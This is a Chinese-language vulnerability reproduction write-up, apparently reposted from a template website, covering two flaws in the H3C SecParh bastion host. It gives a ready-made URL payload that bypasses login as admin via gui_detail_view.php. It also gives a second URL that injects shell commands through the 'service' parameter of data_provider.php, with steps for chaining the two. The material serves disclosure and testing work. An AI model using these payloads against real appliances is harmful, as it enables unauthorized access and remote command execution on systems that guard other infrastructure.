1.H3C SecParh堡垒机任意用户登录漏洞
1.1.漏洞描述
在H3C SecParh堡垒机 get_detail_view.php 存在任意用户登录漏洞。
1.2.漏洞影响
H3C SecParh堡垒机
1.3.漏洞复现
1.3.1.登录页面
该漏洞版本的登录页面如下,2018年的。
1.3.2.构建URL
URL:https://IP地址:端口//audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin
1.4.总结
这里确实成功登录上去了,若设定三权的话,可能存在把admin用户设定为类似与这里的审计管理员,那么就需要测试是否能够跳转到操作管理员或者其它的一些管理员账号上去。这里就不再深入测试,只是提供一个思路。
2.H3C SecParh堡垒机远程命令执行漏洞
2.1.漏洞描述
H3C SecParh堡垒机data_provider.php存在远程命令执行漏洞,攻击者通过任意用户登录或者账号密码进入后台就可以构造特殊的请求执行命令。
2.2.漏洞影响
H3C SecParh堡垒机
2.3.漏洞复现
2.3.1.登录页面
该漏洞版本的登录页面如下,2018年的。
2.3.2.构建URL
URL:https://IP地址:端口/audit/data_provider.php?ds_y=2019&ds_m=04&ds_d=02&ds_hour=09&ds_min40&server_cond=&service=$(pwd)&identity_cond=&query_type=all&format=json&browse=true
需要注意一定要通过先通过任意用户登录获取Cookie,然后在URL中service后面的括号中输入想要执行的命令,即可实现远程命令执行。
文章来源:https://www.toymoban.com/news/detail-448558.html
2.4.总结
我使用火狐浏览器,我访问后就自动将信息进行下载,不过也有浏览器直接跳转界面的也行,都能够看到。文章来源地址https://www.toymoban.com/news/detail-448558.html
到了这里,关于H3C SecParh堡垒机任意用户登录与远程执行代码漏洞的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!